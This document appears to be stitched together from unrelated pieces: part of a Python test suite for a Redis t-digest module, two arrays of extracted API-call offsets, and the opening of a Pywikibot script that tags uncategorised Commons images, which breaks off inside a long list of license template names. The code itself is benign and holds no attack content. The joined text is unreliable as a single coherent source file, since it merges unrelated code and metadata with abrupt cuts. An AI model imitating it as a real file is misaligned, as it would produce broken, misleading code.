for pos in range(0, len(array_reply), 2):
property_name = array_reply[pos]
property_value = array_reply[pos + 1]
reply_dict[property_name] = property_value
return reply_dict
class testTDigest:
def __init__(self):
self.env = Env(decodeResponses=True)
self.assertOk = self.env.assertTrue
self.cmd = self.env.cmd
self.assertEqual = self.env.assertEqual
self.assertRaises = self.env.assertRaises
self.assertTrue = self.env.assertTrue
self.assertAlmostEqual = self.env.assertAlmostEqual
self.assertGreater = self.env.assertGreater
self.assertAlmostEqual = self.env.assertAlmostEqual
self.restart_and_reload = self.env.restartAndReload
def test_tdigest_create(self):
for compression in range(100, 1000, 100):
self.assertOk(self.cmd("tdigest.create", "tdigest", compression))
self.assertEqual(
compression,
parse_tdigest_info(self.cmd("tdigest.info", "tdigest"))["Compression"],
)
def test_negative_tdigest_create(self):
self.cmd("SET", "tdigest", "B")
# WRONGTYPE
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.create", "tdigest", 100
)
self.cmd("DEL", "tdigest")
# arity lower
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.create", "tdigest"
)
# arity upper
self.assertRaises(
redis.exceptions.ResponseError,
self.cmd,
"tdigest.create",
"tdigest",
100,
5,
)
# parsing
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.create", "tdigest", "a"
)
# compression negative/zero value
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.create", "tdigest", 0
)
# compression negative/zero value
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.create", "tdigest", -1
)
def test_tdigest_reset(self):
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# reset on empty histogram
self.assertOk(self.cmd("tdigest.reset", "tdigest"))
# insert datapoints into sketch
for x in range(100):
self.assertOk(self.cmd("tdigest.add", "tdigest", random.random(), 1.0))
# assert we have 100 unmerged nodes
self.assertEqual(
100,
parse_tdigest_info(self.cmd("tdigest.info", "tdigest"))["Unmerged nodes"],
)
self.assertOk(self.cmd("tdigest.reset", "tdigest"))
# assert we have 100 unmerged nodes
self.assertEqual(
0, parse_tdigest_info(self.cmd("tdigest.info", "tdigest"))["Unmerged nodes"]
)
def test_negative_tdigest_reset(self):
self.cmd("SET", "tdigest", "B")
# WRONGTYPE
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.reset", "tdigest"
)
self.cmd("DEL", "tdigest")
# empty key
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.reset", "tdigest"
)
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# arity lower
self.assertRaises(redis.exceptions.ResponseError, self.cmd, "tdigest.reset")
# arity upper
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.reset", "tdigest", 100
)
def test_tdigest_add(self):
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# reset on empty histogram
self.assertOk(self.cmd("tdigest.reset", "tdigest"))
# insert datapoints into sketch
for x in range(10000):
self.assertOk(
self.cmd(
"tdigest.add",
"tdigest",
random.random() * 10000,
random.random() * 500 + 1.0,
)
)
def test_negative_tdigest_add(self):
self.cmd("SET", "tdigest", "B")
# WRONGTYPE
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.add", "tdigest", 100, 100
)
self.cmd("DEL", "tdigest")
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# arity lower
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.add", "tdigest"
)
# arity upper
self.assertRaises(
ResponseError, self.cmd, "tdigest.add", "tdigest", 100, 5, 100.0
)
# key does not exist
self.assertRaises(
ResponseError, self.cmd, "tdigest.add", "dont-exist", 100, 100
)
# parsing
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.add", "tdigest", "a", 5
)
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.add", "tdigest", 5.0, "a"
)
def test_tdigest_merge(self):
self.assertOk(self.cmd("tdigest.create", "to-tdigest", 100))
self.assertOk(self.cmd("tdigest.create", "from-tdigest", 100))
# insert datapoints into sketch
for _ in range(100):
self.assertOk(self.cmd("tdigest.add", "from-tdigest", 1.0, 1.0))
for _ in range(100):
self.assertOk(self.cmd("tdigest.add", "to-tdigest", 1.0, 10.0))
# merge from-tdigest into to-tdigest
self.assertOk(self.cmd("tdigest.merge", "to-tdigest", "from-tdigest"))
# we should now have 1100 weight on to-histogram
to_info = parse_tdigest_info(self.cmd("tdigest.info", "to-tdigest"))
total_weight_to = float(to_info["Merged weight"]) + float(
to_info["Unmerged weight"]
)
self.assertEqual(1100, total_weight_to)
def test_tdigest_merge_to_empty(self):
self.assertOk(self.cmd("tdigest.create", "to-tdigest", 100))
self.assertOk(self.cmd("tdigest.create", "from-tdigest", 100))
# insert datapoints into sketch
for _ in range(100):
self.assertOk(self.cmd("tdigest.add", "from-tdigest", 1.0, 1.0))
# merge from-tdigest into to-tdigest
self.assertOk(self.cmd("tdigest.merge", "to-tdigest", "from-tdigest"))
# assert we have same merged weight on both histograms ( given the to-histogram was empty )
from_info = parse_tdigest_info(self.cmd("tdigest.info", "from-tdigest"))
total_weight_from = float(from_info["Merged weight"]) + float(
from_info["Unmerged weight"]
)
to_info = parse_tdigest_info(self.cmd("tdigest.info", "to-tdigest"))
total_weight_to = float(to_info["Merged weight"]) + float(
to_info["Unmerged weight"]
)
self.assertEqual(total_weight_from, total_weight_to)
def test_negative_tdigest_merge(self):
self.cmd("SET", "to-tdigest", "B")
self.cmd("SET", "from-tdigest", "B")
# WRONGTYPE
self.assertRaises(
ResponseError, self.cmd, "tdigest.merge", "to-tdigest", "from-tdigest"
)
self.cmd("DEL", "to-tdigest")
self.assertOk(self.cmd("tdigest.create", "to-tdigest", 100))
self.assertRaises(
ResponseError, self.cmd, "tdigest.merge", "to-tdigest", "from-tdigest"
)
self.cmd("DEL", "from-tdigest")
self.assertOk(self.cmd("tdigest.create", "from-tdigest", 100))
# arity lower
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.merge", "to-tdigest"
)
# arity upper
self.assertRaises(
ResponseError,
self.cmd,
"tdigest.merge",
"to-tdigest",
"from-tdigest",
"from-tdigest",
)
# key does not exist
self.assertRaises(
ResponseError, self.cmd, "tdigest.merge", "dont-exist", "to-tdigest"
)
self.assertRaises(
ResponseError, self.cmd, "tdigest.merge", "to-tdigest", "dont-exist"
)
def test_tdigest_min_max(self):
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# test for no datapoints first
self.assertEqual(sys.float_info.max, float(self.cmd("tdigest.min", "tdigest")))
self.assertEqual(sys.float_info.min, float(self.cmd("tdigest.max", "tdigest")))
# insert datapoints into sketch
for x in range(1, 101):
self.assertOk(self.cmd("tdigest.add", "tdigest", x, 1.0))
# min/max
self.assertEqual(100, float(self.cmd("tdigest.max", "tdigest")))
self.assertEqual(1, float(self.cmd("tdigest.min", "tdigest")))
def test_negative_tdigest_min_max(self):
self.cmd("SET", "tdigest", "B")
# WRONGTYPE
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.min", "tdigest"
)
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.max", "tdigest"
)
# key does not exist
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.min", "dont-exist"
)
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.max", "dont-exist"
)
self.cmd("DEL", "tdigest", "B")
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# arity lower
self.assertRaises(redis.exceptions.ResponseError, self.cmd, "tdigest.min")
self.assertRaises(redis.exceptions.ResponseError, self.cmd, "tdigest.max")
# arity upper
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.min", "tdigest", 1
)
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.max", "tdigest", 1
)
def test_tdigest_quantile(self):
self.assertOk(self.cmd("tdigest.create", "tdigest", 500))
# insert datapoints into sketch
for x in range(1, 10000):
self.assertOk(self.cmd("tdigest.add", "tdigest", x * 0.01, 1.0))
# assert min min/max have same result as quantile 0 and 1
self.assertEqual(
float(self.cmd("tdigest.max", "tdigest")),
float(self.cmd("tdigest.quantile", "tdigest", 1.0)),
)
self.assertEqual(
float(self.cmd("tdigest.min", "tdigest")),
float(self.cmd("tdigest.quantile", "tdigest", 0.0)),
)
self.assertAlmostEqual(
1.0, float(self.cmd("tdigest.quantile", "tdigest", 0.01)), 0.01
)
self.assertAlmostEqual(
99.0, float(self.cmd("tdigest.quantile", "tdigest", 0.99)), 0.01
)
def test_negative_tdigest_quantile(self):
self.cmd("SET", "tdigest", "B")
# WRONGTYPE
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.quantile", "tdigest", 0.9
)
# key does not exist
self.assertRaises(
ResponseError, self.cmd, "tdigest.quantile", "dont-exist", 0.9
)
self.cmd("DEL", "tdigest", "B")
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# arity lower
self.assertRaises(redis.exceptions.ResponseError, self.cmd, "tdigest.quantile")
# arity upper
self.assertRaises(
redis.exceptions.ResponseError,
self.cmd,
"tdigest.quantile",
"tdigest",
1,
1,
)
# parsing
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.quantile", "tdigest", "a"
)
def test_tdigest_cdf(self):
self.assertOk(self.cmd("tdigest.create", "tdigest", 500))
# insert datapoints into sketch
for x in range(1, 100):
self.assertOk(self.cmd("tdigest.add", "tdigest", x, 1.0))
self.assertAlmostEqual(
0.01, float(self.cmd("tdigest.cdf", "tdigest", 1.0)), 0.01
)
self.assertAlmostEqual(
0.99, float(self.cmd("tdigest.cdf", "tdigest", 99.0)), 0.01
)
def test_negative_tdigest_cdf(self):
self.cmd("SET", "tdigest", "B")
# WRONGTYPE
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.cdf", "tdigest", 0.9
)
# key does not exist
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.cdf", "dont-exist", 0.9
)
self.cmd("DEL", "tdigest", "B")
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# arity lower
self.assertRaises(redis.exceptions.ResponseError, self.cmd, "tdigest.cdf")
# arity upper
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.cdf", "tdigest", 1, 1
)
# parsing
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.cdf", "tdigest", "a"
)
def test_negative_tdigest_info(self):
self.cmd("SET", "tdigest", "B")
# WRONGTYPE
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.info", "tdigest"
)
# dont exist
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.info", "dont-exist"
)
self.cmd("DEL", "tdigest", "B")
self.assertOk(self.cmd("tdigest.create", "tdigest", 100))
# arity lower
self.assertRaises(redis.exceptions.ResponseError, self.cmd, "tdigest.info")
# arity upper
self.assertRaises(
redis.exceptions.ResponseError, self.cmd, "tdigest.info", "tdigest", 1
)
def test_save_load(self):
self.assertOk(self.cmd("tdigest.create", "tdigest", 500))
# insert datapoints into sketch
for _ in range(1, 101):
self.assertOk(self.cmd("tdigest.add", "tdigest", 1.0, 1.0))
self.assertEqual(True, self.cmd("SAVE"))
mem_usage_prior_restart = self.cmd("MEMORY", "USAGE", "tdigest")
self.restart_and_reload()
# assert we have 100 unmerged nodes
self.assertEqual(1, self.cmd("EXISTS", "tdigest"))
self.assertEqual(
100,
float(
parse_tdigest_info(self.cmd("tdigest.info", "tdigest"))["Merged weight"]
),
)
mem_usage_after_restart = self.cmd("MEMORY", "USAGE", "tdigest")
self.assertEqual(mem_usage_prior_restart, mem_usage_after_restart)
|
[
"random.random",
"RLTest.Env"
] |
[((578, 603), 'RLTest.Env', 'Env', ([], {'decodeResponses': '(True)'}), '(decodeResponses=True)\n', (581, 603), False, 'from RLTest import Env\n'), ((2793, 2808), 'random.random', 'random.random', ([], {}), '()\n', (2806, 2808), False, 'import random\n'), ((4350, 4365), 'random.random', 'random.random', ([], {}), '()\n', (4363, 4365), False, 'import random\n'), ((4395, 4410), 'random.random', 'random.random', ([], {}), '()\n', (4408, 4410), False, 'import random\n')]
|
#!/usr/bin/python
"""
Program to add uncat template to images without categories at commons.
See imagerecat.py to add these images to categories.
This script is working on the given site, so if the commons should be handled,
the site commons should be given and not a Wikipedia or similar.
¶ms;
"""
#
# (C) Pywikibot team, 2008-2020
#
# Distributed under the terms of the MIT license.
#
from contextlib import suppress
from datetime import timedelta
import pywikibot
from pywikibot.exceptions import ArgumentDeprecationWarning
from pywikibot import pagegenerators
from pywikibot.tools import issue_deprecation_warning
docuReplacements = {
'¶ms;': pagegenerators.parameterHelp,
}
# Probably unneeded because these are hidden categories. Have to figure it out.
ignoreCategories = ['[[Category:CC-BY-SA-3.0]]',
'[[Category:GFDL]]',
'[[Category:Media for cleanup]]',
'[[Category:Media lacking a description]]',
'[[Category:Media lacking author information]]',
'[[Category:Media lacking a description]]',
'[[Category:Self-published work]]']
# Don't bother to put the template on an image with one of these templates
skipTemplates = ['Delete',
'Nocat',
'No license',
'No permission since',
'No source',
'No source since',
'Uncategorized',
'Uncat']
# Ignore templates in this long list when looking for relevant categories
ignoreTemplates = ['1000Bit',
'1922 cyc',
'2MASS',
'Aa',
'Ab',
'AbuGhraibPic',
'ADRM',
'ADRM2',
'AerialPhotograph-mlitJP',
'Af',
'Agência Brasil',
'AgenciaBrasil',
'AgenciaCamaraBr',
'AgenciaSenadoBr',
'Ak',
'AL2TB',
'Alabordache',
'Alexj2002C220PD',
'Alexj2002InkscapePD',
'Aln',
'Als',
'Am',
'An',
'Ang',
'Anonymous work',
'AnotherAuthor',
'Apache',
'Ar',
'Arc',
'Arn',
'Artistic-2',
'As',
'Ashipilin',
'AskedForInfo',
'Ast',
'AstronautPhoto',
'Attribution',
'Attribution Entomart',
'Attribution-Ubisoft',
'Auroranorthlicense',
'Author-de',
'Autorisation photos aériennes <NAME>',
'Autotravel',
'Av',
'Avk',
'Ay',
'Az',
'Ba',
'BadJPEG',
'Bar',
'BArch-License',
'BArch-link',
'Bat-smg',
'Bcl',
'Be',
'Be-tarask',
'Be-x-old',
'BeeldbankVenW',
'Bg',
'Bh',
'Bi',
'Blue Marble',
'Bm',
'Bmz',
'Bn',
'Bo',
'Botev license',
'Botev relicensed',
'BotMoveToCommons',
'Bpy',
'Br',
'Bs',
'BSD',
'BSDwithdisclaimer',
'Byp',
'C0',
'Ca',
'CatedralDeSal',
'Cc',
'CC-AR-Presidency',
'Cc-by',
'Cc-by-1.0',
'Cc-by-1.0-nl',
'Cc-by-2.0',
'Cc-by-2.0-at',
'Cc-by-2.0-be',
'Cc-by-2.0-br',
'Cc-by-2.0-cl',
'Cc-by-2.0-de',
'Cc-by-2.0-es',
'Cc-by-2.0-fr',
'Cc-by-2.0-it',
'Cc-by-2.0-kr',
'Cc-by-2.0-nl',
'Cc-by-2.0-uk',
'Cc-by-2.1-au',
'Cc-by-2.1-es',
'Cc-by-2.1-jp',
'Cc-by-2.5',
'Cc-by-2.5-bg',
'Cc-by-2.5-br',
'Cc-by-2.5-dk',
'Cc-by-2.5-es',
'Cc-by-2.5-in',
'Cc-by-2.5-it',
'Cc-by-2.5-my',
'Cc-by-2.5-nl',
'Cc-by-2.5-pl',
'Cc-by-2.5-se',
'Cc-by-2.5,2.0,1.0',
'Cc-by-3.0',
'Cc-by-3.0-gr',
'Cc-by-3.0-IndiaFM',
'Cc-by-3.0-nl',
'Cc-by-3.0-rs',
'Cc-by-3.0-us',
'Cc-by-3.0,2.5,2.0,1.0',
'Cc-by-all',
'Cc-by-nc-sa-2.0-dual',
'Cc-by-sa',
'Cc-by-sa-1.0',
'Cc-by-sa-1.0-fi',
'Cc-by-sa-1.0-tw',
'Cc-by-sa-2.0',
'Cc-by-sa-2.0-at',
'Cc-by-sa-2.0-au',
'Cc-by-sa-2.0-be',
'Cc-by-sa-2.0-br',
'Cc-by-sa-2.0-ca',
'Cc-by-sa-2.0-cl',
'Cc-by-sa-2.0-de',
'Cc-by-sa-2.0-es',
'Cc-by-sa-2.0-fr',
'Cc-by-sa-2.0-it',
'Cc-by-sa-2.0-kr',
'Cc-by-sa-2.0-nl',
'Cc-by-sa-2.0-tw',
'Cc-by-sa-2.0-uk',
'Cc-by-sa-2.1-au',
'Cc-by-sa-2.1-es',
'Cc-by-sa-2.1-jp',
'Cc-by-sa-2.5',
'CC-BY-SA-2.5',
'Cc-by-sa-2.5-ar',
'Cc-by-sa-2.5-au',
'Cc-by-sa-2.5-bg',
'Cc-by-sa-2.5-br',
'Cc-by-sa-2.5-ca',
'Cc-by-sa-2.5-ch',
'Cc-by-sa-2.5-cl',
'Cc-by-sa-2.5-cn',
'Cc-by-sa-2.5-de',
'Cc-by-sa-2.5-dk',
'Cc-by-sa-2.5-es',
'Cc-by-sa-2.5-hu',
'Cc-by-sa-2.5-in',
'Cc-by-sa-2.5-it',
'Cc-by-sa-2.5-mx',
'Cc-by-sa-2.5-my',
'Cc-by-sa-2.5-nl',
'Cc-by-sa-2.5-pl',
'Cc-by-sa-2.5-pt',
'Cc-by-sa-2.5-se',
'Cc-by-sa-2.5-si',
'Cc-by-sa-2.5-tw',
'Cc-by-sa-2.5,1.0',
'Cc-by-sa-2.5,2.0,1.0',
'Cc-by-sa-2.5,2.0,1.0-no-link',
'Cc-by-sa-3.0',
'Cc-by-sa-3.0-gr',
'Cc-by-sa-3.0-nl',
'Cc-by-sa-3.0-rs',
'Cc-by-sa-3.0-tw',
'Cc-by-sa-3.0-us',
'Cc-by-sa-3.0,2.5,2.0,1.0',
'Cc-by-sa-3.0,2.5,2.0,1.0-no-link',
'Cc-by-sa-all',
'Cc-by-sa-jul',
'CC-LukeFord',
'Cc-pd',
'Cc-sa-1.0',
'Cc-zero',
'Cdo',
'Ce',
'Ceb',
'CeCILL',
'CERN-CMS',
'Ch',
'China-PD',
'Cho',
'Chr',
'Chuck',
'Chy',
'Cityview',
'Cityview2',
'Civertan license',
'Claude',
'CNG',
'Co',
'Coa-Germany-b1945',
'Coloured SVG boxes',
'Common Public License',
'Contact-VP',
'Convert to SVG',
'CopyAttribEmail',
'Copyright by Wikimedia',
'Copyright jalpeyrie',
'Copyrighted free use',
'Copyrighted free use provided that',
'Copyrighted IOC',
'CopyrightedFreeUse',
'CopyrightedFreeUse-Link',
'Cr',
'Created by ForrestSjap',
'Created with Inkscape',
'Creator',
'Credit line',
'Credits-panoramafotos.net',
'Crh',
'Crh-cyrl',
'Croatian currency',
'Cs',
'Csb',
'Cu',
'Cv',
'Cy',
'Cz',
'Da',
'Date',
'De',
'De-cc-by-sa-2.0',
'<NAME>',
'Diq',
'DMonniaux',
'DMonniaux-DADVSI-20060507',
'Dsb',
'DSL',
'Dum',
'Dv',
'Dz',
'EdwardCurtis',
'Ee',
'EEK banknote',
'EEK coin',
'El',
'Elephants Dream',
'Eml',
'En',
'En icon',
'Eo',
'EPL',
'Erin Silversmith Licence',
'Es',
'EST-Land Board',
'Estremeñu',
'Et',
'Eu',
'EU location',
'Euro coin common face',
'Europe location',
'Expat',
'Ext',
'Fa',
'FAL',
'Fancyfootworklicense',
'Faroe stamps',
'Fcb981c',
'Ff',
'Fi',
'FirefoxWiki',
'Fiu-vro',
'Fj',
'Flag-Germany-b1945',
'Flickr',
'Flickr-change-of-license',
'Flickr-unfree-but',
'Flickrreview',
'Fo',
'FOLP',
'FOP',
'Fr',
'Fr icon',
'Frc',
'Free screenshot',
'Frp',
'Fur',
'FWL',
'Fy',
'Ga',
'Gag',
'Gakk Copyright',
'Gan',
'Gd',
'Geograph',
'GFDL',
'GFDL or cc-by-nc-sa',
'GFDL or cc-by-nc-sa/2.5',
'GFDL-1.2',
'GFDL-1.2-en',
'GFDL-CC-triple',
'GFDL-DD',
'GFDL-en',
'GFDL-GMT',
'GFDL-Institut de Qualitat Agroalimentària',
'GFDL-IS',
'GFDL-it',
'GFDL-ja',
'GFDL-Landsat-Kashmir3d',
'GFDL-OpenGeoDB',
'GFDL-retouched',
'GFDL-Samoborac',
'GFDL-self',
'GFDL-Self',
'GFDL-self-en',
'GFDL-user',
'GFDL-user-als',
'GFDL-user-ar',
'GFDL-user-bat-smg',
'GFDL-user-bs',
'GFDL-user-cs',
'GFDL-user-da',
'GFDL-user-de',
'GFDL-user-el',
'GFDL-user-en',
'GFDL-user-en-no-disclaimers',
'GFDL-user-en-note',
'GFDL-user-en-with-disclaimers',
'GFDL-user-es',
'GFDL-user-fa',
'GFDL-user-fi',
'GFDL-user-fr',
'GFDL-user-gl',
'GFDL-user-he',
'GFDL-user-hi',
'GFDL-user-hu',
'GFDL-user-id',
'GFDL-user-it',
'GFDL-user-ja',
'GFDL-user-ko',
'GFDL-user-lt',
'GFDL-user-nl',
'GFDL-user-nn',
'GFDL-user-no',
'GFDL-user-pl',
'GFDL-user-pt',
'GFDL-user-ru',
'GFDL-user-sk',
'GFDL-user-sq',
'GFDL-user-tr',
'GFDL-user-uk',
'GFDL-user-vi',
'GFDL-user-vls',
'GFDL-user-w',
'GFDL-user-zh',
'Giovannino Copyright',
'Gl',
'Glk',
'Gloumouth1Credit',
'Gn',
'GNOME-icon-theme',
'Got',
'GPL',
'GPLv2 only',
'GPLv3',
'Gr',
'Grays Anatomy plate',
'Gu',
'Gv',
'GWArt',
'GWArtOld',
'GWPDA',
'Ha',
'HAER',
'Hak',
'Halibutt Copyright GFDL',
'Halibutt Copyright Ogg',
'HALS',
'Harry',
'Harry2',
'Haw',
'He',
'Heraldic Badge',
'Hi',
'Hiuppo Copyright GFDL',
'Ho',
'Hr',
'Hsb',
'Ht',
'Hu',
'Hy',
'Hz',
'Ia',
'Ibiblio-Hyperwar.org',
'Icelandic currency',
'Icelandic stamp',
'Id',
'Ie',
'Ig',
'Ii',
'Ik',
'Ike-latn',
'Ilo',
'ImageUpload',
'Img-confirmation',
'INewton',
'Information',
'Information Picswiss',
'Inkscape',
'Insignia',
'Insignia Catalonia',
'Insignia Navarre',
'Io',
'IPPAR',
'Is',
'It',
'It icon',
'Iu',
'Ja',
'Ja2',
'<NAME> permission',
'Jbo',
'Jean-PolGRANDMONTCredit',
'JewishEncyclopedia',
'Joergens.mi licence',
'JPEG version of PNG',
'Jv',
'Ka',
'Kaa',
'Kab',
'Kameno doba',
'Kg',
'Ki',
'Kirkeinfo',
'Kirkenorge',
'Kj',
'Kk',
'Kl',
'Km',
'Kn',
'Ko',
'Kopimi',
'Kr',
'Krj',
'Ks',
'Ksh',
'Ku',
'Kv',
'Kw',
'Ky',
'La',
'LA2-Blitz',
'Lad',
'Lan',
'LarsenCopyright',
'Lb',
'Lbe',
'Lfn',
'Lg',
'LGPL',
'Li',
'LibriVox public domain',
'License',
'Lij',
'LinuxeristCopyright',
'Lld',
'Lmo',
'Ln',
'Lo',
'LOC-image',
'LOC-pchrom',
'LOC-prok',
'LOC-prokc',
'Location',
'Location dec',
'Location dms',
'LocationRequired',
'Lothar1976',
'Loz',
'Ls',
'Lt',
'Lueger',
'Lv',
'LviatourCredit',
'Map of Japan-Shigenobu AOKI',
'Map-Austria-GNu',
'Marine-marchande.net',
'MartinX',
'Master son',
'MdB',
'Mdf',
'Met.no',
'Mg',
'Mh',
'Mi',
'Mildenhall',
'MindInfo',
'MIT',
'Mk',
'Ml',
'MLDoan',
'Mn',
'Mo',
'MoengCredit',
'Money-EU banknote',
'Money-Eu',
'Money-REAL',
'MORS',
'MPL',
'Mr',
'Ms',
'Mt',
'MTL',
'Museum.ru',
'My',
'Myv',
'Mzn',
'Na',
'Nah',
'Namespace',
'NAMESPACE',
'Nap',
'NAUMANN',
'Nb',
'Nds',
'Nds-nl',
'Ne',
'NetMarine',
'New',
'Newsflash Photo',
'Ng',
'NGC7000',
'NGruev',
'NGW',
'Ngw2',
'Nickshanks-cc-by-2.0-email',
'Njegos.org',
'Nl',
'Nl icon',
'Nn',
'Nn icon',
'No',
'No icon',
'Non',
'Norges Golfforbund',
'Norwegian coat of arms',
'Not-PD-US-URAA',
'Nov',
'Nrbelex Photo',
'Nrbelex Photo 400D',
'Nrm',
'Nso',
'Nv',
'Ny',
'NYC Subway map',
'NYPL-image-full',
'OAL',
'Object location',
'Oc',
'OldOS',
'Olessi Copyright Ogg',
'Om',
'Open Beelden',
'Open Font',
'Openphotoreview',
'Or',
'Originally uploaded',
'Os',
'OsborneFossils',
'OTrondal',
'OTRS',
'Otrs pending',
'OTRS pending',
'Own',
'Own work',
'Pa',
'Pag',
'PAGENAME',
'PAGENAMEE',
'Painting',
'Pam',
'Pap',
'Parlament.ch',
'PAshieldsource',
'PBresseler',
'PCL',
'PD',
'PD Colombia',
'PD patents',
'PD-1923',
'PD-AB-exempt',
'PD-Abdul Hamid',
'PD-AIGA',
'PD-Albania-exempt',
'PD-Algeria',
'PD-AM-exempt',
'PD-ancient-script',
'PD-AR-Anonymous',
'PD-AR-Movie',
'PD-AR-Photo',
'PD-Archivesnormandie',
'PD-Armenia',
'PD-Art',
'PD-art',
'PD-art-life-70',
'PD-art-US',
'PD-Art-YorckProject',
'PD-Australia',
'PD-AustrianGov',
'PD-author',
'PD-AZ-exempt',
'PD-Azerbaijan',
'PD-Bahrain',
'PD-Bain',
'PD-Bangladesh',
'PD-because',
'PD-BH-exempt',
'PD-BnFMandragorePic',
'PD-Brady-Handy',
'PD-Brazil-media',
'PD-BrazilGov',
'PD-Britannica',
'PD-Brockhaus&Efron',
'PD-BulgarianGov',
'PD-BW',
'PD-BY-exempt',
'PD-Canada',
'PD-Canada-creator',
'PD-Canada-Crown',
'PD-Canada-photo',
'PD-Canada-stamp',
'PD-Challenger Report',
'PD-chem',
'PD-Chile',
'PD-China',
'PD-Coa-Finland',
'PD-Coa-Germany',
'PD-Coa-Hungary',
'PD-Coins-Krenzer',
'PD-collective anonymous work',
'PD-copyright holder',
'PD-Croatia',
'PD-CroatiaGov',
'PD-CSIRO',
'PD-Cuba',
'PD-CzechGov',
'PD-DAUI',
'PD-DBZ stamps',
'PD-Demis',
'PD-Denmark50',
'PD-DenmarkEVH',
'PD-Detroit',
'PD-Deutsche Bundespost stamps',
'PD-Edison Records',
'PD-EE-exempt',
'PD-EEA',
'PD-Egypt',
'PD-EstoniaPub',
'PD-EU-no author disclosure',
'PD-Feldman-1905',
'PD-Fiji',
'PD-Finland',
'PD-Finland50',
'PD-FinlandGov',
'PD-flag',
'PD-Flag',
'PD-flag-50',
'PD-Flag-Germany',
'PD-FLGov',
'PD-font',
'PD-FOP-DE',
'PD-Fröléens konversationslexikon',
'PD-GallicaPic',
'PD-GDR stamps',
'PD-GE-exempt',
'PD-Generic',
'PD-German Empire stamps',
'PD-German postmarks',
'PD-German stamps',
'PD-GermanGov',
'PD-Google books',
'PD-Gottscho',
'PD-GreekGov',
'PD-Gutenberg',
'PD-heirs',
'PD-Highsmith',
'PD-HK',
'PD-HK-PR',
'PD-HU-exempt',
'PD-Hubble',
'PD-IDGov',
'PD-IDOld-Art29',
'PD-IDOld-Art30',
'PD-imf.org',
'PD-India',
'PD-ineligible',
'PD-Internationale',
'PD-Iran',
'PD-Iraq',
'PD-Ireland',
'PD-IrishGov',
'PD-Israel',
'PD-Israel-Photo',
'PD-ItalyGov',
'PD-Japan',
'PD-Japan-exempt',
'PD-Japan-film',
'PD-Japan-oldphoto',
'PD-Japan-organization',
'PD-Jordan',
'PD-Jordan-Photo',
'PD-JORF',
'PD-JORF-nor-conso',
'PD-Kenya',
'PD-KG-exempt',
'PD-Kuwait',
'PD-KZ-exempt',
'PD-Lebanon',
'PD-Libya',
'PD-link',
'PD-LOC',
'PD-Look',
'PD-LosAlamos',
'PD-Lozinski',
'PD-LT-exempt',
'PD-LV-exempt',
'PD-MacaoGov',
'PD-magic',
'PD-Malawi',
'PD-Manchukuo-stamps',
'PD-MapLibrary',
'PD-Mauritius',
'PD-MD-exempt',
'PD-Mexico',
'PD-Mexico-NIP',
'PD-Meyers',
'PD-Meyers-5th-edition',
'PD-Meyers-6th-edition',
'PD-MNGov',
'PD-MO',
'PD-money-Romania',
'PD-Morocco',
'PD-Namibia',
'PD-National Photo Company',
'PD-Nigeria',
'PD-NL-gemeentevlag',
'PD-NL-gemeentewapen',
'PD-NL-Gov',
'PD-NL-verkeersbord',
'PD-Nordens Flora',
'PD-North Korea',
'PD-Norway50',
'PD-NorwayGov',
'PD-NTBB',
'PD-NZ',
'PD-NZ-50-years',
'PD-old',
'Pd-old',
'PD-Old',
'PD-old-100',
'PD-old-50',
'PD-old-70',
'PD-old-75',
'PD-old-80',
'PD-old-Edition',
'PD-Oman',
'PD-OpenClipart',
'PD-Orgelbrand',
'PD-Ornament1898',
'PD-Pakistan',
'PD-PCL-portraits',
'PD-PDFnet',
'PD-PDphoto.org',
'PD-Peru',
'PD-Philippines',
'PD-PhilippinesPubDoc',
'PD-PMR-exempt',
'PD-Polish',
'PD-Polishsymbol',
'PD-PRC-exempt',
'PD-PT',
'PD-retouched-user',
'PD-retouched-user-w',
'PD-RO-exempt',
'PD-ROC-exempt',
'PD-ROC-Traffic Indicating Lines',
'PD-ROC-Traffic Signs',
'PD-RU-exempt',
'PD-RusEmpire',
'PD-Russia',
'PD-Russia-2008',
'PD-SAGov',
'PD-Saudi Arabia',
'PD-SBH',
'PD-scan',
'PD-Scan',
'PD-SCGGov',
'PD-ScottForesman',
'PD-ScottForesman-raw',
'PD-script',
'PD-Seal-Germany',
'PD-Seattle-Neighborhood-Atlas',
'PD-SeaWiFS',
'PD-self',
'PD-self2',
'PD-SerbiaGov',
'PD-Seychelles',
'PD-SFJ',
'PD-shape',
'PD-Sjöfartsverket',
'PD-SlovakGov',
'PD-South Korea',
'PD-South-Africa',
